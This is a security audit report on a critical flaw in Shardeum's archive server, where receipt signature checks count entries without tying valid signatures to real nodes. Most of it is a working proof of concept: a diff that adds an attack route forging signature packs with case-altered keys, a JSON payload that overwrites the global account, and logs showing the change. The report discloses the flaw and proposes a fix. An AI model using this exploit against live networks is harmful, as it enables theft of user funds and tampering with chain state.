39872 [W&A-Critical] bypass receipt signing validation

#39872 [W&A-Critical] Bypass Receipt Signing Validation

Submitted on Feb 9th 2025 at 15:55:37 UTC by @Blockian for Audit Comp | Shardeum: Ancillaries III

Report ID: #39872
Report Type: Websites and Applications
Report severity: Critical
Target: https://github.com/shardeum/archive-server/tree/itn4
Impacts:
- Direct theft of user funds

Description

Shardeum Ancillaries

Bypass Receipt Signing Validation

Description

A vulnerability in the storeReceiptData function allows a malicious validator to bypass signing validation. This enables them to store arbitrary receipts and overwrite any account data on the archive server. (Including Global Account)

Root Cause

The function verifyAppliedReceiptSignatures validates signaturePack by ensuring that the signatures themselves are valid. However, it does not check whether the signatures originate from actual nodes within the system.

At first glance, this seems acceptable since signaturePack goes through a prior validation in verifyReceiptData. However, this verification contains a critical flaw. Let's examine the relevant snippet of verifyReceiptData:

// ...
    const requiredSignatures =
      config.usePOQo === true
        ? Math.ceil(votingGroupCount * config.requiredVotesPercentage)
        : Math.round(votingGroupCount * config.requiredVotesPercentage)
    if (signaturePack.length < requiredSignatures) {
      Logger.mainLogger.error(
        `Invalid receipt appliedReceipt signatures count is less than requiredSignatures, ${signaturePack.length}, ${requiredSignatures}`
      )
      if (nestedCountersInstance)
        nestedCountersInstance.countEvent(
          'receipt',
          'Invalid_receipt_appliedReceipt_signatures_count_less_than_requiredSignatures'
        )
      return result
    }
    // Using a set to store the unique signatures to avoid duplicates
    const uniqueSigners = new Set()
    for (const signature of signaturePack) {
      const { owner: nodePubKey } = signature
      // Get the node id from the public key
      const node = cycleShardData.nodes.find((node) => node.publicKey === nodePubKey)
      if (node == null) {
        Logger.mainLogger.error(
          `The node with public key ${nodePubKey} of the receipt ${txId}} with ${timestamp} is not in the active nodesList of cycle ${cycle}`
        )
        if (nestedCountersInstance)
          nestedCountersInstance.countEvent(
            'receipt',
            'appliedReceipt_signature_owner_not_in_active_nodesList'
          )
        continue
      }
      // Check if the node is in the execution group
      if (!cycleShardData.parititionShardDataMap.get(homePartition).coveredBy[node.id]) {
        Logger.mainLogger.error(
          `The node with public key ${nodePubKey} of the receipt ${txId} with ${timestamp} is not in the execution group of the tx`
        )
        if (nestedCountersInstance)
          nestedCountersInstance.countEvent(
            'receipt',
            'appliedReceipt_signature_node_not_in_execution_group_of_tx'
          )
        continue
      }
      uniqueSigners.add(nodePubKey)
    }
    if (uniqueSigners.size < requiredSignatures) {
      Logger.mainLogger.error(
        `Invalid receipt appliedReceipt valid signatures count is less than requiredSignatures ${uniqueSigners.size}, ${requiredSignatures}`
      )
      if (nestedCountersInstance)
        nestedCountersInstance.countEvent(
          'receipt',
          'Invalid_receipt_appliedReceipt_valid_signatures_count_less_than_requiredSignatures'
        )
      return result
    }
// ...

The Exploit Strategy

There are two primary validation steps in verifyReceiptData:

The number of signatures in signaturePack must be greater than or equal to requiredSignatures.
The number of unique public keys from valid nodes in signaturePack must also be greater than or equal to requiredSignatures.

A malicious validator can exploit these checks as follows:

Populate signaturePack with at least requiredSignatures valid signatures, which can be generated by any key controlled by the attacker.
Include the public keys of all valid nodes, but pair them with invalid signatures.

This results in signaturePack containing 2 * requiredSignatures entries:

Half are valid signatures produced by the attacker.
Half are invalid signatures that falsely claim to originate from valid nodes.

Despite the invalid signatures, verifyReceiptData considers the validation successful because the length condition is met.

Now, when verifyAppliedReceiptSignatures runs, it finds requiredSignatures valid signatures and passes the check, allowing the malicious validator to bypass signature validation.

Impact

This vulnerability has the same impact as the issue reported here

A malicious validator can modify any account data stored on an archive server if it is connected to the validator via a socket.io connection. This includes the global network account, posing a significant security risk.

Proposed Fix

To prevent this exploit, verifyAppliedReceiptSignatures should:

Verify each signature only if it originates from a valid node.
Reject signatures from unverified sources before counting them.

Proof of Concept

Apply the following git diff on the Archiver for some nice logs and clarity:

diff --git a/src/GlobalAccount.ts b/src/GlobalAccount.ts
index d42adef..b77f308 100644
--- a/src/GlobalAccount.ts
+++ b/src/GlobalAccount.ts
@@ -33,8 +33,10 @@ export function getGlobalNetworkAccount(hash: boolean): object | string {
 }
 
 export function setGlobalNetworkAccount(account: AccountDB.AccountsCopy): void {
+  Logger.mainLogger.info(`changing cachedGlobalNetworkAccountHash: before ${cachedGlobalNetworkAccountHash}`)
   cachedGlobalNetworkAccount = rfdc()(account)
   cachedGlobalNetworkAccountHash = account.hash
+  Logger.mainLogger.info(`changing cachedGlobalNetworkAccountHash: after ${cachedGlobalNetworkAccountHash}`)
 }
 
 interface NetworkConfigChanges {

Apply the following diff on the Core:

diff --git a/src/p2p/Join/routes.ts b/src/p2p/Join/routes.ts
index f415f8ab..d0e8b60b 100644
--- a/src/p2p/Join/routes.ts
+++ b/src/p2p/Join/routes.ts
@@ -1,5 +1,6 @@
 /** ROUTES */
 
+import * as crypto from '@shardeum-foundation/lib-crypto-utils'
 import * as Comms from '../Comms'
 import * as CycleChain from '../CycleChain'
 import * as CycleCreator from '../CycleCreator'
@@ -46,6 +47,7 @@ import { testFailChance } from '../../utils'
 import { shardusGetTime } from '../../network'
 import { verifyPayload } from '../../types/ajv/Helpers'
 import { AJVSchemaEnum } from '../../types/enum/AJVSchemaEnum'
+import { instantForwardReceipts } from '../Archivers'
 
 
 const cycleMarkerRoute: P2P.P2PTypes.Route<Handler> = {
@@ -328,6 +330,142 @@ const standbyRefreshRoute: P2P.P2PTypes.Route<Handler> = {
   },
 }
 
+const createAttackReceipt = (inputs: any): any => {
+  const accountSpecificHash = (account: any): any => {
+    const { account: EVMAccountInfo, timestamp } = account
+    const accountData = { EVMAccountInfo, timestamp }
+    return crypto.hashObj(accountData)
+  }
+
+  const calculateVoteHash = (vote: any): any => {
+    const proposal = vote
+    const applyStatus = {
+      applied: proposal.applied,
+      cantApply: proposal.cant_preApply,
+    }
+    const accountsHash = crypto.hash(
+      crypto.hashObj(proposal.accountIDs) +
+        crypto.hashObj(proposal.beforeStateHashes) +
+        crypto.hashObj(proposal.afterStateHashes)
+    )
+    const proposalHash = crypto.hash(
+      crypto.hashObj(applyStatus) + accountsHash + proposal.appReceiptDataHash
+    )
+    return proposalHash
+  }
+
+  const accountHash = accountSpecificHash(inputs.afterState.data)
+  inputs.afterState.hash = accountHash
+  inputs.afterState.data.hash = accountHash
+
+  const proposal = {
+    accountIDs: [
+      inputs.afterState.accountId
+    ],
+    afterStateHashes: [
+      accountHash
+    ],
+    appReceiptDataHash: crypto.hashObj(inputs.appReceiptData),
+    applied: true,
+    beforeStateHashes: [
+      "6d92eaa97b3ba4f26143b4203b62b243055214eb03b072eb65b29d0eadbc6324"
+    ],
+    cant_preApply: false,
+    txid: inputs.txId
+  }
+
+  const signableObject = {
+    txid: inputs.txId,
+  	voteHash: calculateVoteHash(proposal),
+  	voteTime: inputs.voteTime
+  }
+
+  const signOnStuff = (payload: any, keyPair: any): any => crypto.sign(crypto.hashObj(payload), keyPair.secretKey)
+
+  const attackKeyPair = {
+    publicKey: "4b4d0378d88087d47074006fff1067f24d2b46f0b031dc0eac3c6aae89200f06",
+    secretKey:
+      "94a5acef210ee6d3fbadde8da6cd1246abf6259542265981edd0b1c63a3b2bc14b4d0378d88087d47074006fff1067f24d2b46f0b031dc0eac3c6aae89200f06",
+  }
+
+  const changeCasingOfPubKey = (pubKey: string, index: number): string => {
+    let counter = 0
+    let pubKeyCopy = pubKey
+    for (let i = 0; i < pubKey.length; i++) {
+      const char = pubKeyCopy[i]
+      if (char.toLowerCase() !== char.toUpperCase()) { // this is a letter
+        if (counter === index) {
+          pubKeyCopy = pubKeyCopy.substring(0, i) + char.toUpperCase() + pubKeyCopy.substring(i + 1)
+          return pubKeyCopy
+        } else counter += 1
+      }
+    }
+
+    return pubKeyCopy
+  }
+
+  const allNodesPublicKeys = nodeListFromStates([
+    P2P.P2PTypes.NodeStatus.ACTIVE,
+    P2P.P2PTypes.NodeStatus.READY,
+    P2P.P2PTypes.NodeStatus.SYNCING,
+  ]).map((node) => node.publicKey)
+
+  const sig = signOnStuff(signableObject, attackKeyPair)
+  const signaturePack1 = Array(allNodesPublicKeys.length).fill(0).map((e, i) => ({ owner: changeCasingOfPubKey(attackKeyPair.publicKey, i), sig: sig }))
+  const signaturePack2 = allNodesPublicKeys.map((e) => ({ owner: e, sig: sig }))
+  const signaturePack = [...signaturePack1, ...signaturePack2]
+  const voteOffsets = Array(allNodesPublicKeys.length * 2).fill(inputs.voteTime)
+
+  console.log(`verified BLOCKIAN: ${crypto.verifyObj({ ...signableObject, sign: {
+    owner: attackKeyPair.publicKey,
+    sig: sig
+  } })}`)
+
+  const attackReceipt = {
+    tx: {
+      txId: inputs.txId,
+      timestamp: 1,
+      originalTxData: {}
+    },
+    cycle: 15,
+    signedReceipt: {
+      proposal: proposal,
+      proposalHash: crypto.hashObj(proposal),
+      sign: {
+        owner: attackKeyPair.publicKey,
+        sig: sig
+      },
+      signaturePack: signaturePack,
+      voteOffsets: voteOffsets
+    },
+    beforeStates: [],
+    afterStates: [
+      inputs.afterState
+    ],
+    appReceiptData: inputs.appReceiptData,
+    executionShardKey: inputs.executionShardKey,
+    globalModification: true
+  }
+
+  return attackReceipt
+}
+
+const blockianRoute: P2P.P2PTypes.Route<Handler> = {
+  method: 'POST',
+  name: 'blockian',
+  handler: (req, res) => {
+    console.log("got request from blockian")
+    const body = req.body
+    if (body.debug) {
+      return res.json({ ...body, gotBlockianAttack: true })
+    }
+
+    instantForwardReceipts([createAttackReceipt(body.inputs)])
+
+    res.json({ success: true })
+  },
+}
+
 const joinedV2Route: P2P.P2PTypes.Route<Handler> = {
   method: 'GET',
   name: 'joinedV2/:publicKey',
@@ -778,7 +916,7 @@ const gossipStandbyRefresh: P2P.P2PTypes.GossipHandler<
 }
 
 export const routes = {
-  external: [cycleMarkerRoute, joinRoute, joinedRoute, joinedV2Route, acceptedRoute, unjoinRoute, standbyRefreshRoute],
+  external: [blockianRoute, cycleMarkerRoute, joinRoute, joinedRoute, joinedV2Route, acceptedRoute, unjoinRoute, standbyRefreshRoute],
   gossip: {
     'gossip-join': gossipJoinRoute,
     'gossip-valid-join-requests': gossipValidJoinRequests,

Send the following payload to the new blockian route after the network reaches cycle 15.

{
  "inputs": {
    "txId": "4c3088d41bab7ed541856a5c5434648a3b31f5e18e0b7582a3067f6d9bbe90f4",
    "appReceiptData": {
      "data": {
        "amountSpent": "0x100",
        "readableReceipt": {
          "status": 1
        },
        "receipt": {
          "logs": []
        }
      }
    },
    "afterState": {
      "accountId": "1000000000000000000000000000000000000000000000000000000000000001",
      "cycleNumber": 15,
      "data": {
        "account": {
          "balance": "12345670000000000000000000000000",
          "nonce": "1"
        },
        "accountType": 0,
        "ethAddress": "0xe0291324263d7ec15fa3494bfdc1e902d8bd5d3d",
        "hash": "hash",
        "timestamp": 1739055681599
      },
      "timestamp": 1739055681599,
      "hash": "hash",
      "isGlobal": true
    },
    "voteTime": 7,
    "executionShardKey": "00000000"
  }
}

Now, you'll be able to see the logs of the global account changing:

[2025-02-09T16:12:45.427] [INFO] main - changing cachedGlobalNetworkAccountHash: before 47d6e983d5bda803e4517e6b883fc5b0e862ebd3f68ba77288fba9fb10e2d1e4
[2025-02-09T16:12:45.427] [INFO] main - changing cachedGlobalNetworkAccountHash: after 2ef35235179170de0b834e4c39830f443e010789102ff7e5e5708c2d27979862

Previous#39910 [W&A-Medium] Numerous replay attacks (with arbitrary data) to protected endpoints are possibl Next#39814 [W&A-Low] Prevent new validators from joining the network by a DOS of the archiver

Last updated 7 months ago

Was this helpful?